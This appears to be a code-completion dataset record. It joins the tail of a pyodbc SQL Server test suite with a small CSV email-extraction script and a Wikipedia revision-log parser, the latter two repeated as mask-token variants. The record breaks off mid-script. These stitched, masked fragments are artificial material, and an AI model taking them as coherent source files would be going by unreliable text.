can select using [x z] syntax\"\n\n try:\n cursor.execute(\"create table [test one](int n)\")\n cursor.execute(\"insert into [test one] values(1)\")\n cursor.execute(\"select * from [test one]\")\n v = cursor.fetchone()[0]\n assert v == 1\n finally:\n cursor.rollback()\n\n\ndef test_lower_case():\n \"Ensure pyodbc.lowercase forces returned column names to lowercase.\"\n try:\n pyodbc.lowercase = True\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"create table t1(Abc int, dEf int)\")\n cursor.execute(\"select * from t1\")\n\n names = [t[0] for t in cursor.description]\n names.sort()\n\n assert names == [\"abc\", \"def\"]\n finally:\n # Put it back so other tests don't fail.\n pyodbc.lowercase = False\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n cursor.execute(\"create table t1(a int, b char(3))\")\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute(\"select * from t1\").fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n # A project was failing to create temporary tables via select into.\n cursor.execute(\"create table t1(s char(7))\")\n cursor.execute(\"insert into t1 values(?)\", \"testing\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert v == \"testing\"\n\n cursor.execute(\"select s into t2 from t1\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert v == \"testing\"\n\n\ndef test_executemany(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(a int, b varchar(10))\")\n\n params = [(i, str(i)) for i in range(1, 6)]\n\n cursor.executemany(\"insert into t1(a, b) values (?,?)\", params)\n\n count = cursor.execute(\"select count(*) from t1\").fetchone()[0]\n assert count == len(params)\n\n cursor.execute(\"select a, b from t1 order by a\")\n rows = cursor.fetchall()\n assert count == len(rows)\n\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_one(cursor: pyodbc.Cursor):\n \"Pass executemany a single sequence\"\n cursor.execute(\"create table t1(a int, b varchar(10))\")\n\n params = [(1, \"test\")]\n\n cursor.executemany(\"insert into t1(a, b) values (?,?)\", params)\n\n count = cursor.execute(\"select count(*) from t1\").fetchone()[0]\n assert count == len(params)\n\n cursor.execute(\"select a, b from t1 order by a\")\n rows = cursor.fetchall()\n assert count == len(rows)\n\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_dae_0(cursor: pyodbc.Cursor):\n \"\"\"\n DAE for 0-length value\n \"\"\"\n cursor.execute(\"create table t1(a nvarchar(max))\")\n\n cursor.fast_executemany = True\n cursor.executemany(\"insert into t1(a) values(?)\", [['']])\n\n assert cursor.execute(\"select a from t1\").fetchone()[0] == ''\n\n cursor.fast_executemany = False\n\n\ndef test_executemany_failure(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure that an exception is raised if one query in an executemany fails.\n \"\"\"\n cursor.execute(\"create table t1(a int, b varchar(10))\")\n\n params = [(1, 'good'),\n ('error', 'not an int'),\n (3, 'good')]\n\n with pytest.raises(pyodbc.Error):\n cursor.executemany(\"insert into t1(a, b) value (?, ?)\", params)\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(a int, b int, c int, d int)\")\n cursor.execute(\"insert into t1 values(1,2,3,4)\")\n\n row = cursor.execute(\"select * from t1\").fetchone()\n\n result = row[:]\n assert result is row\n\n result = row[:-1]\n assert result == (1, 2, 3)\n\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(a int, b int, c int, d varchar(50))\")\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n\n row = cursor.execute(\"select * from t1\").fetchone()\n\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n\n result = str(row[:-1])\n assert result == \"(1, 2, 3)\"\n\n result = str(row[:1])\n assert result == \"(1,)\"\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n\n cursor.execute(\"create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))\")\n cursor.execute(\"insert into t1(c2, c3) values (?,?)\", v2, v3)\n\n row = cursor.execute(\"select c2, c3, c2 + c3 as both from t1\").fetchone()\n\n assert row.both == v2 + v3\n\n\ndef test_view_select(cursor: pyodbc.Cursor):\n # Reported in forum: Can't select from a view? I think I do this a lot, but another test\n # never hurts.\n\n # Create a table (t1) with 3 rows and a view (t2) into it.\n cursor.execute(\"create table t1(c1 int identity(1, 1), c2 varchar(50))\")\n for i in range(3):\n cursor.execute(\"insert into t1(c2) values (?)\", f\"string{i}\")\n cursor.execute(\"create view t2 as select * from t1\")\n\n # Select from the view\n cursor.execute(\"select * from t2\")\n rows = cursor.fetchall()\n assert rows is not None\n assert len(rows) == 3\n\n\ndef test_autocommit():\n cnxn = connect()\n assert cnxn.autocommit is False\n cnxn = None\n\n cnxn = connect(autocommit=True)\n assert cnxn.autocommit is True\n cnxn.autocommit = False\n assert cnxn.autocommit is False\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute(\"drop procedure pyodbctest\")\n cursor.commit()\n except:\n pass\n\n cursor.execute(\"create table t1(s varchar(10))\")\n cursor.execute(\"insert into t1 values(?)\", \"testing\")\n\n cursor.execute(\"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\")\n\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n # Insert 1, 2, and 3. Fetch 1, skip 2, fetch 3.\n\n cursor.execute(\"create table t1(id int)\")\n for i in range(1, 5):\n cursor.execute(\"insert into t1 values(?)\", i)\n cursor.execute(\"select id from t1 order by id\")\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0 # defaults to zero (off)\n\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n # Only lists and tuples are allowed.\n cursor.execute(\"create table t1 (word varchar (100))\")\n\n words = {'a', 'b', 'c'}\n\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute(\"insert into t1 (word) values (?)\", words)\n\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany(\"insert into t1 (word) values (?)\", words)\n\n\ndef test_row_execute(cursor: pyodbc.Cursor):\n \"Ensure we can use a Row object as a parameter to execute\"\n cursor.execute(\"create table t1(n int, s varchar(10))\")\n cursor.execute(\"insert into t1 values (1, 'a')\")\n row = cursor.execute(\"select n, s from t1\").fetchone()\n assert row\n\n cursor.execute(\"create table t2(n int, s varchar(10))\")\n cursor.execute(\"insert into t2 values (?, ?)\", row)\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"Ensure we can use a Row object as a parameter to executemany\"\n cursor.execute(\"create table t1(n int, s varchar(10))\")\n\n for i in range(3):\n cursor.execute(\"insert into t1 values (?, ?)\", i, chr(ord('a') + i))\n\n rows = cursor.execute(\"select n, s from t1\").fetchall()\n assert len(rows) != 0\n\n cursor.execute(\"create table t2(n int, s varchar(10))\")\n cursor.executemany(\"insert into t2 values (?, ?)\", rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"Ensure cursor.description is correct\"\n\n cursor.execute(\"create table t1(n int, s varchar(8), d decimal(5,2))\")\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute(\"select * from t1\")\n\n # (I'm not sure the precision of an int is constant across different versions, bits, so I'm\n # hand checking the items I do know.\n\n # int\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0 # scale\n assert t[6] is True # nullable\n\n # varchar(8)\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8 # precision\n assert t[5] == 0 # scale\n assert t[6] is True # nullable\n\n # decimal(5, 2)\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5 # precision\n assert t[5] == 2 # scale\n assert t[6] is True # nullable\n\n\ndef test_cursor_messages_with_print(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure the Cursor.messages attribute is handled correctly with a simple PRINT statement.\n \"\"\"\n assert not cursor.messages\n\n # SQL Server PRINT statements are never more than 8000 characters\n # https://docs.microsoft.com/en-us/sql/t-sql/language-elements/print-transact-sql#remarks\n for msg in ('hello world', 'ABCDEFGHIJ' * 800):\n cursor.execute(f\"PRINT '{msg}'\")\n messages = cursor.messages\n assert isinstance(messages, list)\n assert len(messages) == 1\n assert isinstance(messages[0], tuple)\n assert len(messages[0]) == 2\n assert isinstance(messages[0][0], str)\n assert isinstance(messages[0][1], str)\n assert '[01000] (0)' == messages[0][0]\n assert messages[0][1].endswith(msg)\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\")\n\n # The messages will look like:\n #\n # [Microsoft][ODBC Driver 18 for SQL Server][SQL Server]Message 1a\n\n # result set 1: messages, rows\n cursor.execute(\"exec test_cursor_messages\")\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [\n re.search(r'Message \\d[ab]$', m[1]).group(0)\n for m in cursor.messages\n ]\n assert msgs == ['Message 1a', 'Message 1b']\n\n # result set 2: rows, no messages\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n\n # result set 3: messages, no rows\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [\n re.search(r'Message \\d[ab]$', m[1]).group(0)\n for m in cursor.messages\n ]\n assert msgs == ['Message 2a', 'Message 2b']\n\n # result set 4: no rows, no messages\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"Ensure None can be used for params other than the first\"\n # Some driver/db versions would fail if NULL was not the first parameter because\n # SQLDescribeParam (only used with NULL) could not be used after the first call to\n # SQLBindParameter. This means None always worked for the first column, but did not work\n # for later columns.\n #\n # If SQLDescribeParam doesn't work, pyodbc would use VARCHAR which almost always worked.\n # However, binary/varbinary won't allow an implicit conversion.\n\n cursor.execute(\"create table t1(n int, blob varbinary(max))\")\n cursor.execute(\"insert into t1 values (1, newid())\")\n row = cursor.execute(\"select * from t1\").fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n\n sql = \"update t1 set n=?, blob=?\"\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n # cnxn.getinfo(pyodbc.SQL_DESCRIBE_PARAMETER) returns False for FreeTDS, so pyodbc\n # can't call SQLDescribeParam to get the correct parameter type. This can lead to\n # errors being returned from SQL Server when sp_prepexec is called, e.g., \"Implicit\n # conversion from data type varchar to varbinary(max) is not allowed.\"\n #\n # So at least verify that the user can manually specify the parameter type\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute(\"select * from t1\").fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n def convert1(value):\n # The value is the raw bytes (as a bytes object) read from the\n # database. We'll simply add an X at the beginning at the end.\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n # Same as above, but add a Y at the beginning at the end.\n return 'Y' + value.decode('latin1') + 'Y'\n\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"create table t1(n int, v varchar(10))\")\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n\n # Clear all conversions and try again. There should be no Xs this time.\n cnxn.clear_output_converters()\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n # Same but clear using remove_output_converter.\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n # Clear via add_output_converter, passing None for the converter function.\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n # retrieve and temporarily replace converter (get_output_converter)\n #\n # case_1: converter already registered\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'X123.45X'\n #\n # case_2: no converter already registered\n cnxn.clear_output_converters()\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute(\"select v from t1\").fetchone()[0]\n assert value == '123.45'\n\n\ndef test_too_large(cursor: pyodbc.Cursor):\n \"\"\"Ensure error raised if insert fails due to truncation\"\"\"\n value = 'x' * 1000\n cursor.execute(\"create table t1(s varchar(800))\")\n\n with pytest.raises(pyodbc.Error):\n cursor.execute(\"insert into t1 values (?)\", value)\n\n\ndef test_row_equal(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(n int, s varchar(20))\")\n cursor.execute(\"insert into t1 values (1, 'test')\")\n row1 = cursor.execute(\"select n, s from t1\").fetchone()\n row2 = cursor.execute(\"select n, s from t1\").fetchone()\n assert row1 == row2\n\n\ndef test_row_gtlt(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(n int, s varchar(20))\")\n cursor.execute(\"insert into t1 values (1, 'test1')\")\n cursor.execute(\"insert into t1 values (1, 'test2')\")\n rows = cursor.execute(\"select n, s from t1 order by s\").fetchall()\n assert rows[0] < rows[1]\n assert rows[0] <= rows[1]\n assert rows[1] > rows[0]\n assert rows[1] >= rows[0]\n assert rows[0] != rows[1]\n\n rows = list(rows)\n rows.sort() # uses <\n\n\ndef test_context_manager_success():\n \"Ensure `with` commits if an exception is not raised\"\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"create table t1(n int)\")\n cnxn.commit()\n\n with cnxn:\n cursor.execute(\"insert into t1 values (1)\")\n\n rows = cursor.execute(\"select n from t1\").fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 1\n\n\ndef test_context_manager_failure(cursor: pyodbc.Cursor):\n \"Ensure `with` rolls back if an exception is raised\"\n cnxn = connect()\n cursor = cnxn.cursor()\n\n # We'll insert a row and commit it. Then we'll insert another row followed by an\n # exception.\n\n cursor.execute(\"create table t1(n int)\")\n cursor.execute(\"insert into t1 values (1)\")\n cnxn.commit()\n\n with pytest.raises(pyodbc.Error):\n with cnxn:\n cursor.execute(\"insert into t1 values (2)\")\n cursor.execute(\"delete from bogus\")\n\n cursor.execute(\"select max(n) from t1\")\n val = cursor.fetchval()\n assert val == 1\n\n\ndef test_untyped_none(cursor: pyodbc.Cursor):\n # From issue 129\n value = cursor.execute(\"select ?\", None).fetchone()[0]\n assert value is None\n\n\ndef test_large_update_nodata(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a varbinary(max))')\n hundredkb = b'x' * 100 * 1024\n cursor.execute('update t1 set a=? where 1=0', (hundredkb,))\n\n\ndef test_func_param(cursor: pyodbc.Cursor):\n try:\n cursor.execute(\"drop function func1\")\n except:\n pass\n cursor.execute(\"\"\"\n create function func1 (@testparam varchar(4))\n returns @rettest table (param varchar(4))\n as\n begin\n insert @rettest\n select @testparam\n return\n end\n \"\"\")\n cursor.commit()\n value = cursor.execute(\"select * from func1(?)\", 'test').fetchone()[0]\n assert value == 'test'\n\n\ndef test_columns(cursor: pyodbc.Cursor):\n # When using aiohttp, `await cursor.primaryKeys('t1')` was raising the error\n #\n # Error: TypeError: argument 2 must be str, not None\n #\n # I'm not sure why, but PyArg_ParseTupleAndKeywords fails if you use \"|s\" for an\n # optional string keyword when calling indirectly.\n\n cursor.execute(\"create table t1(a int, b varchar(3), xΏz varchar(4))\")\n\n cursor.columns('t1')\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n\n # Now do the same, but specifically pass in None to one of the keywords. Old versions\n # were parsing arguments incorrectly and would raise an error. (This crops up when\n # calling indirectly like columns(*args, **kwargs) which aiodbc does.)\n\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n\n cursor.execute(f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\")\n\n col_count = len([col.column_name for col in cursor.columns(table_name)])\n assert col_count == 1\n\n cursor.execute(f\"drop table {table_name}\")\n\n\ndef test_cancel(cursor: pyodbc.Cursor):\n # I'm not sure how to reliably cause a hang to cancel, so for now we'll settle with\n # making sure SQLCancel is called correctly.\n cursor.execute(\"select 1\")\n cursor.cancel()\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n # https://github.com/mkleehammer/pyodbc/issues/423\n #\n # When sending a varchar parameter, pyodbc is supposed to set ColumnSize to the number\n # of characters. Ensure it works even with 4-byte characters.\n #\n # http://www.fileformat.info/info/unicode/char/1f31c/index.htm\n\n v = \"x \\U0001F31C z\"\n\n cursor.execute(\"create table t1(s nvarchar(100))\")\n cursor.execute(\"insert into t1 values (?)\", v)\n\n result = cursor.execute(\"select s from t1\").fetchone()[0]\n\n assert result == v\n\n\ndef test_emoticons_as_literal(cursor: pyodbc.Cursor):\n # similar to `test_emoticons_as_parameter`, above, except for Unicode literal\n #\n # http://www.fileformat.info/info/unicode/char/1f31c/index.htm\n\n # FreeTDS ODBC issue fixed in version 1.1.23\n # https://github.com/FreeTDS/freetds/issues/317\n\n v = \"x \\U0001F31C z\"\n\n cursor.execute(\"create table t1(s nvarchar(100))\")\n cursor.execute(f\"insert into t1 values (N'{v}')\")\n\n result = cursor.execute(\"select s from t1\").fetchone()[0]\n\n assert result == v\n\n\ndef _test_tvp(cursor: pyodbc.Cursor, diff_schema):\n # Test table value parameters (TVP). I like the explanation here:\n #\n # https://www.mssqltips.com/sqlservertip/1483/using-table-valued-parameters-tvp-in-sql-server/\n #\n # \"At a high level the TVP allows you to populate a table declared as a T-SQL variable,\n # then pass that table as a parameter to a stored procedure or function.\"\n #\n # \"The TVP must be declared READONLY. You cannot perform any DML (i.e. INSERT, UPDATE,\n # DELETE) against the TVP; you can only reference it in a SELECT statement.\"\n #\n # In this test we'll create a table, pass it to a stored procedure, and have the stored\n # procedure simply return the rows from the TVP.\n #\n # Apparently the way pyodbc knows something is a TVP is because it is in a sequence. I'm\n # not sure I like that as it is very generic and specific to SQL Server. It would be wiser\n # to define a wrapper pyodbc.TVP or pyodbc.Table object, similar to the DB APIs `Binary`\n # object.\n\n pyodbc.native_uuid = True\n # This is the default, but we'll reset it in case a previous test fails to.\n\n procname = 'SelectTVP'\n typename = 'TestTVP'\n\n if diff_schema:\n schemaname = 'myschema'\n procname = schemaname + '.' + procname\n typenameonly = typename\n typename = schemaname + '.' + typename\n\n # (Don't use \"if exists\" since older SQL Servers don't support it.)\n try:\n cursor.execute(\"drop procedure \" + procname)\n except:\n pass\n try:\n cursor.execute(\"drop type \" + typename)\n except:\n pass\n if diff_schema:\n try:\n cursor.execute(\"drop schema \" + schemaname)\n except:\n pass\n cursor.commit()\n\n if diff_schema:\n cursor.execute(\"CREATE SCHEMA myschema\")\n cursor.commit()\n\n cursor.execute(\n f\"\"\"\n CREATE TYPE {typename} AS TABLE(\n c01 VARCHAR(255),\n c02 VARCHAR(MAX),\n c03 VARBINARY(255),\n c04 VARBINARY(MAX),\n c05 BIT,\n c06 DATE,\n c07 TIME,\n c08 DATETIME2(5),\n c09 BIGINT,\n c10 FLOAT,\n c11 NUMERIC(38, 24),\n c12 UNIQUEIDENTIFIER)\n \"\"\")\n cursor.commit()\n cursor.execute(\n f\"\"\"\n CREATE PROCEDURE {procname} @TVP {typename} READONLY\n AS SELECT * FROM @TVP;\n \"\"\")\n cursor.commit()\n\n # The values aren't exactly VERY_LONG_LEN but close enough and *significantly* faster than\n # the loop we had before.\n VERY_LONG_LEN = 2000000\n long_string = ''.join(chr(i) for i in range(32, 127)) # printable characters\n long_bytearray = bytes(list(range(255)))\n very_long_string = long_string * (VERY_LONG_LEN // len(long_string))\n very_long_bytearray = long_bytearray * (VERY_LONG_LEN // len(long_bytearray))\n\n params = [\n # Three rows with all of the types in the table defined above.\n (\n 'abc', 'abc',\n bytes([0xD1, 0xCE, 0xFA, 0xCE]),\n bytes([0x0F, 0xF1, 0xCE, 0xCA, 0xFE]), True,\n date(1997, 8, 29), time(9, 13, 39),\n datetime(2018, 11, 13, 13, 33, 26, 298420),\n 1234567, 3.14, Decimal('31234567890123.141243449787580175325274'),\n uuid.UUID('4fe34a93-e574-04cc-200a-353f0d1770b1'),\n ),\n (\n '', '',\n bytes([0x00, 0x01, 0x02, 0x03, 0x04]),\n bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05]), False,\n date(1, 1, 1), time(0, 0, 0),\n datetime(1, 1, 1, 0, 0, 0, 0),\n -9223372036854775808, -1.79E+308, Decimal('0.000000000000000000000001'),\n uuid.UUID('33f7504c-2bac-1b83-01d1-7434a7ba6a17'),\n ),\n (\n long_string, very_long_string,\n bytes(long_bytearray), bytes(very_long_bytearray), True,\n date(9999, 12, 31), time(23, 59, 59),\n datetime(9999, 12, 31, 23, 59, 59, 999990),\n 9223372036854775807, 1.79E+308, Decimal('99999999999999.999999999999999999999999'),\n uuid.UUID('ffffffff-ffff-ffff-ffff-ffffffffffff'),\n )\n ]\n\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = [tuple(row) for row in cursor.execute(f\"exec {procname} ?\", p1).fetchall()]\n\n # The values make it very difficult to troubleshoot if something is wrong, so instead of\n # asserting they are the same, we'll walk them if there is a problem to identify which is\n # wrong.\n for row, param in zip(result_array, params):\n if row != param:\n for r, p in zip(row, param):\n assert r == p\n\n # Now test with zero rows.\n\n params = []\n p1 = [params]\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = cursor.execute(f\"exec {procname} ?\", p1).fetchall()\n assert result_array == params\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp(cursor: pyodbc.Cursor):\n _test_tvp(cursor, False)\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\ndef get_sqlserver_version(cursor: pyodbc.Cursor):\n\n \"\"\"\n Returns the major version: 8-->2000, 9-->2005, 10-->2008\n \"\"\"\n cursor.execute(\"exec master..xp_msver 'ProductVersion'\")\n row = cursor.fetchone()\n return int(row.Character_Value.split('.', 1)[0])\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. This simplifies the tests by letting us put None into\n an array of other lengths and pass them here, moving the special case check into one place.\n \"\"\"\n if length is None:\n return None\n\n # Put non-ASCII characters at the front so we don't end up chopping one in half in a\n # multi-byte encoding like UTF-8.\n\n v = 'á'\n\n remaining = max(0, length - len(v))\n if remaining:\n seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n\n if remaining <= len(seed):\n v += seed\n else:\n c = (remaining + len(seed) - 1 // len(seed))\n v += seed * c\n\n if encoding:\n v = v.encode(encoding)\n\n # We chop *after* encoding because if we are encoding then we want bytes.\n v = v[:length]\n\n return v\n",
"step-ids": [
47,
56,
70,
97,
108
]
}
|
[
47,
56,
70,
97,
108
] |
import csv
with open('faculty.csv') as facultycsv:
emails = list() #all email addresses
for line in facultycsv:
line = line.split(',')
if line[0] == 'name' : continue
try:
email = line[3].rstrip()
emails.append(email)
except:
continue
with open('emails.csv', 'w') as emailcsv:
writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)
for email in emails:
writer.writerow([email])
|
normal
|
{
"blob_id": "5af5c10c149c7b0e2a969be7895780d26a4294d0",
"index": 7326,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('faculty.csv') as facultycsv:\n emails = list()\n for line in facultycsv:\n line = line.split(',')\n if line[0] == 'name':\n continue\n try:\n email = line[3].rstrip()\n emails.append(email)\n except:\n continue\nwith open('emails.csv', 'w') as emailcsv:\n writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)\n for email in emails:\n writer.writerow([email])\n",
"step-3": "import csv\nwith open('faculty.csv') as facultycsv:\n emails = list()\n for line in facultycsv:\n line = line.split(',')\n if line[0] == 'name':\n continue\n try:\n email = line[3].rstrip()\n emails.append(email)\n except:\n continue\nwith open('emails.csv', 'w') as emailcsv:\n writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)\n for email in emails:\n writer.writerow([email])\n",
"step-4": "import csv\n\nwith open('faculty.csv') as facultycsv:\n emails = list() #all email addresses\n\n for line in facultycsv:\n line = line.split(',')\n if line[0] == 'name' : continue\n try:\n email = line[3].rstrip()\n emails.append(email)\n except:\n continue\n\nwith open('emails.csv', 'w') as emailcsv:\n writer = csv.writer(emailcsv, quoting=csv.QUOTE_MINIMAL)\n for email in emails:\n writer.writerow([email])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
format_string = '%s %s %s %s %s %s %s %s %s\n'
while True:
edit = [sys.stdin.readline() for i in range(14)]
if edit[13] == '':
break
revision = edit[0].split(' ')
article_id, rev_id, title, timestamp, username, user_id = ('a' +
revision[1], 'e' + revision[2], revision[3], revision[4],
revision[5], 'u' + revision[6].strip())
if user_id.startswith('uip'):
continue
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ''
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
outline = format_string % (article_id, rev_id, user_id, username,
title, timestamp, category, minor, word_count)
sys.stdout.write(outline)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
format_string = '%s %s %s %s %s %s %s %s %s\n'
while True:
edit = [sys.stdin.readline() for i in range(14)]
if edit[13] == '':
break
revision = edit[0].split(' ')
article_id, rev_id, title, timestamp, username, user_id = ('a' +
revision[1], 'e' + revision[2], revision[3], revision[4],
revision[5], 'u' + revision[6].strip())
if user_id.startswith('uip'):
continue
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ''
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
outline = format_string % (article_id, rev_id, user_id, username,
title, timestamp, category, minor, word_count)
sys.stdout.write(outline)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import sys
def main():
format_string = '%s %s %s %s %s %s %s %s %s\n'
while True:
edit = [sys.stdin.readline() for i in range(14)]
if edit[13] == '':
break
revision = edit[0].split(' ')
article_id, rev_id, title, timestamp, username, user_id = ('a' +
revision[1], 'e' + revision[2], revision[3], revision[4],
revision[5], 'u' + revision[6].strip())
if user_id.startswith('uip'):
continue
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ''
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
outline = format_string % (article_id, rev_id, user_id, username,
title, timestamp, category, minor, word_count)
sys.stdout.write(outline)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import sys
def main():
# String to format output
